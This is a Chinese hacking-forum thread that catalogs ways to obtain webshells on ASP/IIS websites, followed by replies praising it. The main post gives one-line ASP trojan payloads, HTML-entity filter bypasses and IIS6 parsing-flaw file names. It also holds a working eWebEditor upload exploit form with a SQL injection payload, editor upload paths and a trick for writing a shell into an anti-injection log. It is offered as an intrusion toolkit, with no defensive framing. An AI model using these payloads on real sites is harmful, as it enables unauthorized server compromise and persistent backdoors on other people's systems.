返回列表 发帖

[原创文章] asp拿shell

1.有备份,上传图片备份。如不能修改文件后缀名,可备份成1.asp/1.mdb或1.asa/1.mdb的形式& u/ S3 L4 X9 _
& }4 M) j: C* W
2.写入配置文件一句话木马,如果过滤了<,%,>,(,)可尝试&#60;&#37;eval request&#40;&#34;value&#34;&#41;&#37;&#62;来突破,例如config.asp& d6 V# W; G% U) `' {

+ {3 F3 U$ i( h) y+ m9 g3.上传漏洞:1 q) x3 l; W! S, _& f

6 ~6 H1 e! }1 t3 F动网上传漏洞:抓包nc提交,其中路径可改为zjq.asp 的形式,空格替换成0x00
' g7 v  u6 o, Q2 @- q  i1 s# r* d4 S$ _- h7 B9 \: Y
逻辑上传漏洞:同时上传两个文件,第一个为正常文件,第二个为iis可解析后缀文件( p% }/ W6 ^' n6 T3 }; @& X
- f8 t6 d) g3 O
雷池上传漏洞:http://localhost/leichinews/admin/uploadPic.asp?actionType=mod&picName=test.asp: A4 }! h: o) j3 \9 t- t4 ?
然后在上传文件里面填要传的图片格式的ASP木马
) x3 K( s! G% m! I. g, W就可以在uppic目录下上传文件名为test.asp的文件uppic/test.asp
0 W, z" }4 K, V+ A. `  l, `! T4.ewebeditor:有后台添加asa或aaspsp上传类型,前提要进入后台。没后台如2.16版本可利用如下代码上传9 _- M8 K1 j, A; E! j

  O/ e$ w; J) t$ f- G<html>- K# [3 Z5 m' f  Q( d1 g8 k& ^  \' e
<head>
4 o* J/ K2 a4 S8 `) i) ]<title>ewebeditor upload.asp上传利用</title>  x5 o8 k8 b' h9 f: t" B
</head>* i/ W! b( M% u- \( W- k3 T
<body>8 Y6 n1 C. X0 _. H( z" R/ q
<form action="upload.asp?action=save&type=IMAGE&style=luoye' union select S_ID,S_Name,S_Dir,S_CSS,S_UploadDir,S_Width,S_Height,S_Memo,S_IsSys,S_FileExt,S_FlashExt, [S_ImageExt]%2b'|cer',S_MediaExt,S_FileSize,S_FlashSize,S_ImageSize,S_MediaSize,S_StateFlag,S_DetectFromWord,S_InitMode,S_BaseUrl from ewebeditor_style where s_name='standard' and 'a'='a" method=post name=myform enctype="multipart/form-data">
; }" P* u* S/ W$ H/ r. }% k<input type=file name=uploadfile size=100><br><br>( R3 r) s4 v  o: }
<input type=submit value=Fuck>
: B; m/ k9 J0 L, [. e) @* Y* g</form>& z* a& ~5 t) i4 K
</body>
. ?) h5 ~  W5 y</form>, T. d* J" B8 \' u5 V, W
</html>) ~, |/ a0 _! ^
' b4 S6 v$ K  T; f" U/ W
2.8般亦可以利用admin_uploadfile.asp?id=14&dir=..列目录,前提是此文件可访问,或cookie欺骗后可访问) ^5 Y) U( h1 m& x5 p" t# Q
5.fckeditor:/FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/asp/connector.asp2 P* Z. L7 }5 P2 {  B* e

! b) t; U, E, l) T4 y3 e利用windows2003解析。建立zjq.asp的文件夹
) J7 x' b* F" U% n8 \: R
2 z8 L6 E! F8 ~+ k6 t2 A6 \; m6.southidceditor:admin/SouthidcEditor/Admin_Style.asp?action=styleset&id=47。修改上传类型4 Z9 W2 [) F1 [

- e7 w; K4 v, E" ~6 Y7.cuteeditor:类似ewebeditor( I" O) H6 p7 d/ y7 x" t3 n: _2 `

0 l  b8 G) J. _/ H5 [8.htmleditor:同上1 k' n& {3 E5 O5 `
$ Z6 p4 K$ O! q/ `7 N
9.插数据库一句话。前提是知道数据库路径,为asp,asa等后缀,无防下载表,有防下载表可尝试插入以下语句突破
$ @3 ?7 E& m: l  Y5 L( p" O% X5 s/ p- @2 x2 O
<%execute request("value")%><%'<% loop <%:%>8 z9 {2 R2 _+ h. C5 ?& `

( u( o* D6 B7 d7 {6 _4 W<%'<% loop <%:%><%execute request("value")%>5 C6 _3 [. N3 e  V; `- K

- M4 J" `, i3 m( i* M8 z<%execute request("value")'<% loop <%:%>5 l+ {; r, ^9 s2 A  ?% D' ?' x
9.查看cookie,看上传路径是否为cookie记录,可修改为*.asp的形式,利用2003解析漏洞
# z1 K9 w6 j% B9 b9 Z0 w
' A  c% r4 C5 L8 ]10.上传不重命名文件,可上传zjq.asp;zjq.jpg的文件,iis6.0解析漏洞" o0 C+ w- n9 u. w4 ^! \

: ]* G( ^' C9 z  k11.注册用户名为zjq.asp,前提是网站会根据用户名新建一个以用户名命名的文件夹,上传正常图片木马,利用2k3
" I/ M' J/ R- B1 T% ^) p
3 m. G: H8 e& Y" }; ~解析漏洞得到webshell9 d' l9 u# I; j# x
& {7 G, ~0 j/ ]; H! I1 k
12.mssql差异备份,日志备份,前提需知道web路径
# I, n" Y% e9 @; ?4 [9 h8 A7 i; n5 _, W* d. ?
13.先备份数据库(拿到shell便于恢复网站访问),上传图片shell,数据库为asp,asa等后缀,恢复数据库填写图片路径,速度要快,因为恢复完网站就不能正常访问,一句话连接得webshell/ z' F& A5 ~- P1 X! g3 N

9 a/ v" d9 C$ ]14.添加上传类型php,并上传phpshell,前提服务器能解析php,例如dvbbs8.2后台拿shell
, s" H* y1 ~# `& }. u2 {
7 G* h, P& K3 G15.有些系统用的是防注入程序,数据库默认为sqlin.asp,我们可以www.xx.com/*.asp?id=1'<script language=VBScript runat=server>execute(request("zjq"))</Script>,这样就会在sqlin.asp中写入一句话shell,连接即可
) B8 j& g' M6 r' j; w& Y0 X5 t/ M& w6 o& o; h! h
以上只是本人的一些拙见,并不完善,以后想到了再继续添加1 n3 m! h: ?: |4 D- Y
不是我原创。我的朋友,飞鸟游鱼原创的
2

评分人数

  • 1335csy

  • 超超

好东西能分享 谢谢!!!

TOP

kankankankan
1

TOP

写的很不错

TOP

1# yyw258520 4 {+ z$ a; X# i- y

' a; z/ X. y+ `  `  I, {4 W, W$ i: M% r
很好啊、基本的入侵方法都包含了
! W+ X$ z) Z' o/ ?/ ]$ Y! [4 L3 q/ K: a; U/ f" N( J
最好来个提权的帖子再。8 s% e/ j) ]' @! q( [
/ G. d* ~- \9 l9 I# @9 x' J
不要网上百度的。

TOP

提权才是王道。

TOP

不错哦 呵呵 学习了

TOP

谢谢楼主分享技术。。。

TOP

返回列表